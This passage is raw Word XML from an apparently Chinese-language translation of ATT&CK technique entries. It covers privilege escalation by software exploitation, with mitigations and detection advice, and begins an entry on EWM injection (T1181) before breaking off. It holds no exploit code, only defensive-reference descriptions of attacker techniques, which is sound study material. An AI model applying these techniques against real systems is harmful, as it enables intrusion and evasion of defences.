          <w:p w14:paraId="368BCFD0" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>有效权限：用户</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2CB0236C" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>数据源：</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>W</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>indows</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>错误上报，进程监控，认证日志</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7C4BBD4C" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:t>CAPEC</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>编号：</w:t>
            </w:r>
            <w:hyperlink r:id="rId94" w:tgtFrame="_blank" w:history="1">
              <w:r w:rsidRPr="00671A0D">
                <w:t>CAPEC-69</w:t>
              </w:r>
            </w:hyperlink>
            <w:r w:rsidRPr="00671A0D">
              <w:t> </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="00AA0F5D" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>版本</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>：</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>1.0</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="2B5B1C58" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="11"/>
        <w:ind w:left="1560"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="615B17F2" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>当攻击者利用程序、服务或操作系统软件或内核本身中的编程错误执行代码时，就会发生软件漏洞攻击。权限级别等安全结构通常会阻碍信息的访问和某些技术的使用，因此攻击者可能需要提升权限后使用软件攻击来规避这些限制。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EB29B67" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>最初获得系统的访问权限时，攻击者可能正在较低权限的进程中操作，这会阻止他们访问系统上的某些资源。漏洞通常可能存在于操作系统组件和常常以更高权限运行的软件中。攻击者</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>可能会</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>利用这些漏洞在系统上获得更高级别的访问权限。有些人可</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>能会因此</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>从非特权或用户级权限升级到系统或</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>root</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>用户权限，</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>具体取决于易受攻击的模块。</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>这可能是攻击者破坏已正确配置的端点系统的</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>必要步骤，</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>限制了其他权限提升方法。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2500C9F0" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="BlockLabel"/>
      </w:pPr>
      <w:r w:rsidRPr="00671A0D">
        <w:lastRenderedPageBreak/>
        <w:t>缓解</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="af3"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="2405"/>
        <w:gridCol w:w="7331"/>
      </w:tblGrid>
      <w:tr w:rsidR="000F2665" w:rsidRPr="00B245BB" w14:paraId="03BA4F1C" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:trPr>
          <w:trHeight w:val="353"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2405" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E7E6E6" w:themeFill="background2"/>
          </w:tcPr>
          <w:p w14:paraId="2A4FB80F" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00B245BB" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableHeading"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B245BB">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
              </w:rPr>
              <w:t>缓解措施</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7331" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E7E6E6" w:themeFill="background2"/>
          </w:tcPr>
          <w:p w14:paraId="4F54CFF2" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00B245BB" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableHeading"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B245BB">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000F2665" w:rsidRPr="00671A0D" w14:paraId="4A6BB2E9" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2405" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1D7990A2" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rStyle w:val="af4"/>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:t>应用隔离</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rStyle w:val="af4"/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:t>和沙箱</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7331" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5BAE57D0" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>使用沙箱来阻止</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>攻击者</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>利用未发现或未修补的漏洞来实施</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>攻击操作</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>。也可通过其他类型的虚拟化和应用微分段来减轻某些类型漏洞攻击的影响。但在这些系统中仍可能存在其他漏洞</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>和缺陷攻击风险。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000F2665" w:rsidRPr="00671A0D" w14:paraId="171E37B3" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2405" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="20BB6126" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rStyle w:val="af4"/>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:t>漏洞利用防护</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7331" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4F8AB3BD" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>可以使用安全应用程序，</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>例如</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>WDEG</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>（</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>Windows Defender Exploit Guard</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>）和</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>EMET</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>（</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>Enhanced Mitigation Experience Toolkit</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>），来</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>检测</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>攻击行为，</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>从而</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>缓解某些攻击行为的</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>影响</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>。也可</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>通过控制流完整性检查</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>来</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>识别和阻止软件攻击。</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rStyle w:val="high-light-bg4"/>
              </w:rPr>
              <w:t>许多保护</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rStyle w:val="high-light-bg4"/>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>措施</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rStyle w:val="high-light-bg4"/>
              </w:rPr>
              <w:t>依赖于体系结构和目标应用二进制文件的兼容性</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>，可能不适用于针对权限提升的软件组件。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000F2665" w:rsidRPr="00671A0D" w14:paraId="0D31C889" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2405" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7D4B7FED" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>威胁情报计划</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7331" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5477A640" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>开发一个强大的网络威胁情报能力，用来确定哪些类型和级别的威胁可能会针对特定组织实施软件攻击和零日漏洞攻击。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000F2665" w:rsidRPr="00671A0D" w14:paraId="28F4689A" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2405" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="49E6D6BB" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rStyle w:val="af4"/>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:t>软件升级</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7331" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="37C8AF28" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>对内部企业端点和服务器通过补丁管理来定期更新软件。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="435D91F8" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="11"/>
        <w:ind w:left="1560"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="77B5AF82" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="BlockLabel"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00671A0D">
        <w:t>检测</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="101AF4F5" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>软件利用检测可能很困难，</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>具体取决于</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>可用的工具。软件攻击可能并不会总是成功，或者可能导致被攻击的进程变得不稳定或崩溃。</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>还要在端点系统上查</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>找</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>能表明</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>攻击</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>成功的行为，例如浏进程的异常行为</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，包括写入</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>磁盘</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>可疑文件，</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>通过进程</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>插入来试图掩盖执行</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>证据，</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>以及</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>发现</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>证据。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75340FAD" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>通常</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>需要</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>更高的权限来执行其他操作，例如凭据转储的</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>某些操作</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。查找可能表示攻击者获得了更高权限的其他活动。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="694A5449" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:spacing w:after="312"/>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009B64D6">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>EWM</w:t>
      </w:r>
      <w:r w:rsidRPr="009B64D6">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>注入</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="af3"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblInd w:w="1560" w:type="dxa"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="8176"/>
      </w:tblGrid>
      <w:tr w:rsidR="000F2665" w14:paraId="03879031" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8176" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="639058D9" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00CE30B2" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00CE30B2">
              <w:t>编号：</w:t>
            </w:r>
            <w:r w:rsidRPr="00CE30B2">
              <w:t xml:space="preserve"> T1181</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="33AD5EFD" w14:textId="234EAA58" w:rsidR="000F2665" w:rsidRPr="00CE30B2" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r>
              <w:t>技术</w:t>
            </w:r>
            <w:r w:rsidRPr="00CE30B2">
              <w:t>：</w:t>
            </w:r>
            <w:r w:rsidRPr="00CE30B2">
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00CE30B2">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>防御逃逸</w:t>
            </w:r>
            <w:r w:rsidRPr="00CE30B2">
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:r w:rsidR="00DE009F">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>权限升级</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1D21E7CE" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00CE30B2" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00CE30B2">
              <w:t>平台：</w:t>
            </w:r>
            <w:r w:rsidRPr="00CE30B2">
              <w:t xml:space="preserve"> Windows</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="38C67FC9" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00CE30B2" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00CE30B2">
              <w:t>所需权限：</w:t>
            </w:r>
            <w:r w:rsidRPr="00CE30B2">
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00CE30B2">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>管理员</w:t>
            </w:r>
            <w:r w:rsidRPr="00CE30B2">
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:r w:rsidRPr="00CE30B2">
              <w:t>系统</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="32211378" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00CE30B2" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00CE30B2">
              <w:t>数据源：</w:t>
            </w:r>
            <w:r w:rsidRPr="00CE30B2">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve"> API</w:t>
            </w:r>
            <w:r w:rsidRPr="00CE30B2">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>监控，进程监控</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="39F4A714" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00CE30B2" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r>
              <w:t>绕过的防御</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>：</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00054561">
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>防病毒</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>、主机</w:t>
            </w:r>
            <w:r w:rsidRPr="00054561">
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>执行保护</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>、</w:t>
            </w:r>
            <w:r w:rsidRPr="00054561">
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>数据执行保护</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="79BA84DA" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00CE30B2">
              <w:t>版本：</w:t>
            </w:r>
            <w:r w:rsidRPr="00CE30B2">
              <w:t xml:space="preserve"> 1.0</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="02B357FC" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="afd"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:after="312"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="39434C"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="35430A28" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>在创建窗口之前，基于</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
